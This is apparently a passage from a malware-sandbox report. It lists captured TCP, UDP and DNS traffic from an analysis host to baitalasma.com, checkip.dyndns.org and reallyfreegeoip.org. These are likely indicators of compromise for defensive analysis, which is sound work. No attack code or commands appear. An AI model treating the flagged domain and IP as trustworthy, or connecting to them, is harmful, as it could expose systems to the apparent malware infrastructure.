May 4, 2024 10:09:32.864108086 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.864114046 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.864141941 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.864152908 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.864481926 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.864533901 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.864535093 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.864542961 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.864578009 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.864938021 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.864989996 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.864991903 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.864999056 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.865035057 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.865245104 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.865293026 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.865304947 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.865310907 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.865339041 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.865349054 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.865592003 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.865632057 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.865643024 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.865648031 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.865675926 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.865690947 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.866134882 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.866174936 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.866189957 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.866194963 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.866221905 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.866236925 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.866676092 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.866727114 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.866730928 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.866736889 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.866777897 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.867141962 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.867189884 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.867196083 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.867202997 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.867237091 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.867300034 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.867357016 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.867366076 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.867418051 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.867688894 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.867719889 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.867738962 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.867743969 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.867753983 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.867774010 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.867911100 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.867952108 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.867963076 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.867966890 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.867995024 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.868005991 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.868432999 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.868479013 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.868489981 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.868494987 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.868525028 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.868532896 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.868547916 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.868587971 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.868594885 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.868599892 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.868633032 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.868685007 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.868725061 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.868737936 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.868741989 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.868774891 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.868781090 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.868840933 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.868881941 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.868887901 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.868892908 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.868928909 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.868969917 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.869009018 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.869018078 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.869023085 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.869052887 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.869064093 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.869190931 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.869229078 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.869234085 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.869240999 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.869272947 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.869286060 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.869329929 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.869369984 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.869379044 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.869384050 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.869404078 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.869419098 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.869611025 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.869657993 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.869668961 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.869673967 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.869702101 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.869718075 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.869968891 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.870007992 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.870021105 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.870027065 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.870048046 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.870068073 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.870277882 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.870321989 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.870327950 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.870332956 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.870363951 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.870379925 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.870496988 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.870537996 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.870548010 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.870553017 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.870579958 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.870594978 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.870829105 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.870857954 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.870882988 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.870887995 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.870898962 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.870927095 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.871148109 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.871186972 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.871196985 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.871201038 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.871233940 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.871335030 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.871386051 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.871391058 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.871400118 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.871437073 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.871656895 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.871690989 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.871706963 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.871717930 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.871726990 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.871737003 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.871756077 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.871790886 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:09:32.871833086 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.875415087 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.902288914 CEST	49164	443	192.168.2.22	38.242.255.115
May 4, 2024 10:09:32.902321100 CEST	443	49164	38.242.255.115	192.168.2.22
May 4, 2024 10:10:03.897012949 CEST	49163	80	192.168.2.22	38.242.255.115
May 4, 2024 10:12:04.044719934 CEST	49165	80	192.168.2.22	158.101.44.242
May 4, 2024 10:12:04.214817047 CEST	80	49165	158.101.44.242	192.168.2.22
May 4, 2024 10:12:04.214906931 CEST	49165	80	192.168.2.22	158.101.44.242
May 4, 2024 10:12:04.278867960 CEST	49165	80	192.168.2.22	158.101.44.242
May 4, 2024 10:12:04.451245070 CEST	80	49165	158.101.44.242	192.168.2.22
May 4, 2024 10:12:04.461009026 CEST	80	49165	158.101.44.242	192.168.2.22
May 4, 2024 10:12:04.735033035 CEST	49165	80	192.168.2.22	158.101.44.242
May 4, 2024 10:12:06.057971001 CEST	49165	80	192.168.2.22	158.101.44.242
May 4, 2024 10:12:06.230024099 CEST	80	49165	158.101.44.242	192.168.2.22
May 4, 2024 10:12:06.433186054 CEST	49166	443	192.168.2.22	172.67.177.134
May 4, 2024 10:12:06.433223009 CEST	443	49166	172.67.177.134	192.168.2.22
May 4, 2024 10:12:06.433304071 CEST	49166	443	192.168.2.22	172.67.177.134
May 4, 2024 10:12:06.435339928 CEST	49165	80	192.168.2.22	158.101.44.242
May 4, 2024 10:12:06.438465118 CEST	49166	443	192.168.2.22	172.67.177.134
May 4, 2024 10:12:06.438489914 CEST	443	49166	172.67.177.134	192.168.2.22
May 4, 2024 10:12:06.778544903 CEST	443	49166	172.67.177.134	192.168.2.22
May 4, 2024 10:12:06.778786898 CEST	49166	443	192.168.2.22	172.67.177.134
May 4, 2024 10:12:06.828803062 CEST	49166	443	192.168.2.22	172.67.177.134
May 4, 2024 10:12:06.828824997 CEST	443	49166	172.67.177.134	192.168.2.22
May 4, 2024 10:12:06.829227924 CEST	443	49166	172.67.177.134	192.168.2.22
May 4, 2024 10:12:06.894844055 CEST	49166	443	192.168.2.22	172.67.177.134
May 4, 2024 10:12:06.940125942 CEST	443	49166	172.67.177.134	192.168.2.22
May 4, 2024 10:12:07.398540974 CEST	443	49166	172.67.177.134	192.168.2.22
May 4, 2024 10:12:07.398642063 CEST	443	49166	172.67.177.134	192.168.2.22
May 4, 2024 10:12:07.398720980 CEST	49166	443	192.168.2.22	172.67.177.134
May 4, 2024 10:12:07.403965950 CEST	49166	443	192.168.2.22	172.67.177.134
May 4, 2024 10:12:07.417736053 CEST	49165	80	192.168.2.22	158.101.44.242
May 4, 2024 10:12:07.590217113 CEST	80	49165	158.101.44.242	192.168.2.22
May 4, 2024 10:12:07.592386007 CEST	49167	443	192.168.2.22	172.67.177.134
May 4, 2024 10:12:07.592425108 CEST	443	49167	172.67.177.134	192.168.2.22
May 4, 2024 10:12:07.592495918 CEST	49167	443	192.168.2.22	172.67.177.134
May 4, 2024 10:12:07.592788935 CEST	49167	443	192.168.2.22	172.67.177.134
May 4, 2024 10:12:07.592808008 CEST	443	49167	172.67.177.134	192.168.2.22
May 4, 2024 10:12:07.792648077 CEST	49165	80	192.168.2.22	158.101.44.242
May 4, 2024 10:12:07.922662973 CEST	443	49167	172.67.177.134	192.168.2.22
May 4, 2024 10:12:07.986479044 CEST	49167	443	192.168.2.22	172.67.177.134
May 4, 2024 10:12:07.986515999 CEST	443	49167	172.67.177.134	192.168.2.22
May 4, 2024 10:12:08.295521975 CEST	443	49167	172.67.177.134	192.168.2.22
May 4, 2024 10:12:08.295635939 CEST	443	49167	172.67.177.134	192.168.2.22
May 4, 2024 10:12:08.295829058 CEST	49167	443	192.168.2.22	172.67.177.134
May 4, 2024 10:12:08.334769011 CEST	49167	443	192.168.2.22	172.67.177.134
May 4, 2024 10:12:08.387398958 CEST	49165	80	192.168.2.22	158.101.44.242
May 4, 2024 10:12:08.557574034 CEST	80	49165	158.101.44.242	192.168.2.22
May 4, 2024 10:12:08.557665110 CEST	49165	80	192.168.2.22	158.101.44.242
May 4, 2024 10:12:19.737972021 CEST	49168	80	192.168.2.22	158.101.44.242
May 4, 2024 10:12:19.909044027 CEST	80	49168	158.101.44.242	192.168.2.22
May 4, 2024 10:12:19.909167051 CEST	49168	80	192.168.2.22	158.101.44.242
May 4, 2024 10:12:19.909475088 CEST	49168	80	192.168.2.22	158.101.44.242
May 4, 2024 10:12:20.081522942 CEST	80	49168	158.101.44.242	192.168.2.22
May 4, 2024 10:12:20.083189011 CEST	80	49168	158.101.44.242	192.168.2.22
May 4, 2024 10:12:20.097779989 CEST	49168	80	192.168.2.22	158.101.44.242
May 4, 2024 10:12:20.308232069 CEST	80	49168	158.101.44.242	192.168.2.22
May 4, 2024 10:12:20.395169973 CEST	80	49168	158.101.44.242	192.168.2.22
May 4, 2024 10:12:20.572244883 CEST	49169	443	192.168.2.22	104.21.67.152
May 4, 2024 10:12:20.572292089 CEST	443	49169	104.21.67.152	192.168.2.22
May 4, 2024 10:12:20.572356939 CEST	49169	443	192.168.2.22	104.21.67.152
May 4, 2024 10:12:20.574661016 CEST	49169	443	192.168.2.22	104.21.67.152
May 4, 2024 10:12:20.574677944 CEST	443	49169	104.21.67.152	192.168.2.22
May 4, 2024 10:12:20.600162029 CEST	49168	80	192.168.2.22	158.101.44.242
May 4, 2024 10:12:20.902178049 CEST	443	49169	104.21.67.152	192.168.2.22
May 4, 2024 10:12:20.902307987 CEST	49169	443	192.168.2.22	104.21.67.152
May 4, 2024 10:12:20.906040907 CEST	49169	443	192.168.2.22	104.21.67.152
May 4, 2024 10:12:20.906049967 CEST	443	49169	104.21.67.152	192.168.2.22
May 4, 2024 10:12:20.906331062 CEST	443	49169	104.21.67.152	192.168.2.22
May 4, 2024 10:12:21.002635002 CEST	49169	443	192.168.2.22	104.21.67.152
May 4, 2024 10:12:21.044122934 CEST	443	49169	104.21.67.152	192.168.2.22
May 4, 2024 10:12:21.274130106 CEST	443	49169	104.21.67.152	192.168.2.22
May 4, 2024 10:12:21.274251938 CEST	443	49169	104.21.67.152	192.168.2.22
May 4, 2024 10:12:21.274321079 CEST	49169	443	192.168.2.22	104.21.67.152
May 4, 2024 10:12:21.294751883 CEST	49169	443	192.168.2.22	104.21.67.152
May 4, 2024 10:12:23.640651941 CEST	49168	80	192.168.2.22	158.101.44.242
May 4, 2024 10:12:23.810739040 CEST	80	49168	158.101.44.242	192.168.2.22
May 4, 2024 10:12:23.832438946 CEST	80	49168	158.101.44.242	192.168.2.22
May 4, 2024 10:12:23.864722967 CEST	49170	443	192.168.2.22	104.21.67.152
May 4, 2024 10:12:23.864774942 CEST	443	49170	104.21.67.152	192.168.2.22
May 4, 2024 10:12:23.864844084 CEST	49170	443	192.168.2.22	104.21.67.152
May 4, 2024 10:12:23.867995024 CEST	49170	443	192.168.2.22	104.21.67.152
May 4, 2024 10:12:23.868007898 CEST	443	49170	104.21.67.152	192.168.2.22
May 4, 2024 10:12:24.094615936 CEST	49168	80	192.168.2.22	158.101.44.242
May 4, 2024 10:12:24.193567038 CEST	443	49170	104.21.67.152	192.168.2.22
May 4, 2024 10:12:24.246501923 CEST	49170	443	192.168.2.22	104.21.67.152
May 4, 2024 10:12:24.246536016 CEST	443	49170	104.21.67.152	192.168.2.22
May 4, 2024 10:12:24.563359976 CEST	443	49170	104.21.67.152	192.168.2.22
May 4, 2024 10:12:24.563478947 CEST	443	49170	104.21.67.152	192.168.2.22
May 4, 2024 10:12:24.563534975 CEST	49170	443	192.168.2.22	104.21.67.152
May 4, 2024 10:12:24.564125061 CEST	49170	443	192.168.2.22	104.21.67.152
May 4, 2024 10:12:24.579102039 CEST	49168	80	192.168.2.22	158.101.44.242
May 4, 2024 10:12:24.755489111 CEST	80	49168	158.101.44.242	192.168.2.22
May 4, 2024 10:12:24.755609035 CEST	49168	80	192.168.2.22	158.101.44.242

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 4, 2024 10:09:28.691240072 CEST	54562	53	192.168.2.22	8.8.8.8
May 4, 2024 10:09:29.006750107 CEST	53	54562	8.8.8.8	192.168.2.22
May 4, 2024 10:12:01.741612911 CEST	52917	53	192.168.2.22	8.8.8.8
May 4, 2024 10:12:01.901099920 CEST	53	52917	8.8.8.8	192.168.2.22
May 4, 2024 10:12:01.901402950 CEST	52917	53	192.168.2.22	8.8.8.8
May 4, 2024 10:12:02.060646057 CEST	53	52917	8.8.8.8	192.168.2.22
May 4, 2024 10:12:02.385366917 CEST	62751	53	192.168.2.22	8.8.8.8
May 4, 2024 10:12:02.544819117 CEST	53	62751	8.8.8.8	192.168.2.22
May 4, 2024 10:12:03.422985077 CEST	62751	53	192.168.2.22	8.8.8.8
May 4, 2024 10:12:03.584394932 CEST	53	62751	8.8.8.8	192.168.2.22
May 4, 2024 10:12:06.246519089 CEST	57893	53	192.168.2.22	8.8.8.8
May 4, 2024 10:12:06.409584045 CEST	53	57893	8.8.8.8	192.168.2.22
May 4, 2024 10:12:08.414736032 CEST	54821	53	192.168.2.22	8.8.8.8
May 4, 2024 10:12:08.574315071 CEST	53	54821	8.8.8.8	192.168.2.22
May 4, 2024 10:12:08.574852943 CEST	54821	53	192.168.2.22	8.8.8.8
May 4, 2024 10:12:08.734234095 CEST	53	54821	8.8.8.8	192.168.2.22
May 4, 2024 10:12:08.734452009 CEST	54821	53	192.168.2.22	8.8.8.8
May 4, 2024 10:12:08.893876076 CEST	53	54821	8.8.8.8	192.168.2.22
May 4, 2024 10:12:08.894104004 CEST	54821	53	192.168.2.22	8.8.8.8
May 4, 2024 10:12:09.053811073 CEST	53	54821	8.8.8.8	192.168.2.22
May 4, 2024 10:12:09.054089069 CEST	54821	53	192.168.2.22	8.8.8.8
May 4, 2024 10:12:09.213597059 CEST	53	54821	8.8.8.8	192.168.2.22
May 4, 2024 10:12:19.245646000 CEST	54719	53	192.168.2.22	8.8.8.8
May 4, 2024 10:12:19.405261993 CEST	53	54719	8.8.8.8	192.168.2.22
May 4, 2024 10:12:19.405617952 CEST	54719	53	192.168.2.22	8.8.8.8
May 4, 2024 10:12:19.565104961 CEST	53	54719	8.8.8.8	192.168.2.22
May 4, 2024 10:12:19.574176073 CEST	49881	53	192.168.2.22	8.8.8.8
May 4, 2024 10:12:19.733669043 CEST	53	49881	8.8.8.8	192.168.2.22
May 4, 2024 10:12:20.409099102 CEST	54998	53	192.168.2.22	8.8.8.8
May 4, 2024 10:12:20.571605921 CEST	53	54998	8.8.8.8	192.168.2.22
May 4, 2024 10:12:24.584345102 CEST	52781	53	192.168.2.22	8.8.8.8
May 4, 2024 10:12:24.745874882 CEST	53	52781	8.8.8.8	192.168.2.22
May 4, 2024 10:12:24.746490955 CEST	52781	53	192.168.2.22	8.8.8.8
May 4, 2024 10:12:24.905953884 CEST	53	52781	8.8.8.8	192.168.2.22
May 4, 2024 10:12:24.906183004 CEST	52781	53	192.168.2.22	8.8.8.8
May 4, 2024 10:12:25.065807104 CEST	53	52781	8.8.8.8	192.168.2.22
May 4, 2024 10:12:25.066088915 CEST	52781	53	192.168.2.22	8.8.8.8
May 4, 2024 10:12:25.225657940 CEST	53	52781	8.8.8.8	192.168.2.22
May 4, 2024 10:12:25.226152897 CEST	52781	53	192.168.2.22	8.8.8.8
May 4, 2024 10:12:25.385550976 CEST	53	52781	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 4, 2024 10:09:28.691240072 CEST	192.168.2.22	8.8.8.8	0xc6af	Standard query (0)	baitalasma.com	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:01.741612911 CEST	192.168.2.22	8.8.8.8	0x337b	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:01.901402950 CEST	192.168.2.22	8.8.8.8	0x337b	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:02.385366917 CEST	192.168.2.22	8.8.8.8	0x27e0	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:03.422985077 CEST	192.168.2.22	8.8.8.8	0x27e0	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:06.246519089 CEST	192.168.2.22	8.8.8.8	0x51a2	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:08.414736032 CEST	192.168.2.22	8.8.8.8	0xfeb2	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:08.574852943 CEST	192.168.2.22	8.8.8.8	0xfeb2	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:08.734452009 CEST	192.168.2.22	8.8.8.8	0xfeb2	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:08.894104004 CEST	192.168.2.22	8.8.8.8	0xfeb2	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:09.054089069 CEST	192.168.2.22	8.8.8.8	0xfeb2	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:19.245646000 CEST	192.168.2.22	8.8.8.8	0xf37b	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:19.405617952 CEST	192.168.2.22	8.8.8.8	0xf37b	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:19.574176073 CEST	192.168.2.22	8.8.8.8	0x65c4	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:20.409099102 CEST	192.168.2.22	8.8.8.8	0x52cc	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:24.584345102 CEST	192.168.2.22	8.8.8.8	0xf5ca	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:24.746490955 CEST	192.168.2.22	8.8.8.8	0xf5ca	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:24.906183004 CEST	192.168.2.22	8.8.8.8	0xf5ca	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:25.066088915 CEST	192.168.2.22	8.8.8.8	0xf5ca	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:25.226152897 CEST	192.168.2.22	8.8.8.8	0xf5ca	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
May 4, 2024 10:09:29.006750107 CEST	8.8.8.8	192.168.2.22	0xc6af	No error (0)	baitalasma.com		38.242.255.115	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:01.901099920 CEST	8.8.8.8	192.168.2.22	0x337b	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
May 4, 2024 10:12:01.901099920 CEST	8.8.8.8	192.168.2.22	0x337b	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:01.901099920 CEST	8.8.8.8	192.168.2.22	0x337b	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:01.901099920 CEST	8.8.8.8	192.168.2.22	0x337b	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:01.901099920 CEST	8.8.8.8	192.168.2.22	0x337b	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:01.901099920 CEST	8.8.8.8	192.168.2.22	0x337b	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:02.060646057 CEST	8.8.8.8	192.168.2.22	0x337b	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
May 4, 2024 10:12:02.060646057 CEST	8.8.8.8	192.168.2.22	0x337b	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:02.060646057 CEST	8.8.8.8	192.168.2.22	0x337b	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:02.060646057 CEST	8.8.8.8	192.168.2.22	0x337b	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:02.060646057 CEST	8.8.8.8	192.168.2.22	0x337b	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:02.060646057 CEST	8.8.8.8	192.168.2.22	0x337b	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
